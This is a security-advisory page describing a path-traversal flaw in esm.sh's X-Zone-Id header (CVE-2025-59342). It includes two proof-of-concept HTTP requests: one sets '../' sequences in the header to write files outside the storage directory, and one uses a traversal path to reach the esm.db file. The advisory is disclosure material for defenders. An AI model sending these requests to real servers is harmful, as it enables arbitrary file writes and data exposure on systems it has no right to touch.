Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

GHSA-g2h5-cvvr-7gmw

GitHub Security Advisory

esm.sh has arbitrary file write via path traversal in `X-Zone-Id` header

✓ GitHub Reviewed MODERATE Has CVE
View on GitHub

Advisory Details

## Summary

A path-traversal flaw in the handling of the `X-Zone-Id` HTTP header allows an attacker to cause the application to write files outside the intended storage location. The header value is used to build a filesystem path but is not properly canonicalized or restricted to the application’s storage base directory. As a result, supplying `../` sequences in `X-Zone-Id` causes files to be written to arbitrary directories (example observed: `~/.esmd/modules/transform/<id>/` instead of `~/.esmd/storage/modules/transform`).

**Severity:** Medium

**Component / Endpoint:**

`POST /transform` — handling of `X-Zone-Id` header

The vulnerable code is in https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L116 and https://github.com/esm-dev/esm.sh/blob/main/server/router.go#L411

**Impact:** Arbitrary file creation / overwrite outside intended storage directory (file write to attacker-controlled path). Possible remote code execution, persistence, tampering with application files, or facilitating further path-traversal attacks.

---

## Proof of Concept (POC)

Request (attacker-supplied `X-Zone-Id` contains path traversal):

```
POST /transform HTTP/1.1
Host: localhost:8888
User-Agent: Den/8.7.1
Accept: */*
Connection: keep-alive
Referer: http://localhost:9999/
Content-Type: application/json
X-Zone-Id: ../../modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/
Content-Length: 325

{
"filename": "example2.js",
"lang": "js",
"code": "console.log('hello');",
"importMap": {
"imports": {
"react": "https://esm.sh/react",
"react-dom": "https://esm.sh/react-dom"
}
},
"jsxImportSource": "react",
"target": "es2022",
"sourceMap": "external",
"minify": true
}
```
<img width="2496" height="1214" alt="Screenshot 2025-09-16 at 21 40 57" src="https://github.com/user-attachments/assets/f878c3f0-5d7d-410c-97ac-20116f5496db" />

Observed result: file written to `~/.esmd/modules/transform/c245626ef6ca0fd9ee37759c5fac606c6ec99daa/example2.js` instead of the intended `~/.esmd/storage/modules/transform/`.

This can be trigger with another path traversal request below

```
GET /+c245626ef6ca0fd9ee37759c5fac606c6ec99daa./../../../esm.db?.css HTTP/1.1
Host: localhost:8888
User-Agent: localhost
Accept: */*
Connection: keep-alive
X-Zone-Id: ../
Referer: http://localhost:9999/

```
<img width="2516" height="710" alt="Screenshot 2025-09-16 at 21 37 07" src="https://github.com/user-attachments/assets/1fcfbed3-c1d2-4093-82d8-4afda225c685" />

---

## Remediation

Simply remove any .. in the `X-Zone-Id` header before actually process the file.

## Credits

- [Ai Ho (Jessie)](https://github.com/j3ssie)
- [CL Yang](https://github.com/A11riseforme)

Affected Packages

Go github.com/esm-dev/esm.sh
Affected versions: 0 (last affected: 136)

Related CVEs

CVE-2025-59342

Key Information

GHSA ID
GHSA-g2h5-cvvr-7gmw
Published
September 17, 2025 7:03 PM
Last Modified
September 17, 2025 7:03 PM
CVSS Score
5.0 /10
Primary Ecosystem
Go
Primary Package
github.com/esm-dev/esm.sh
GitHub Reviewed
✓ Yes

Dataset

Last updated: September 18, 2025 6:29 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.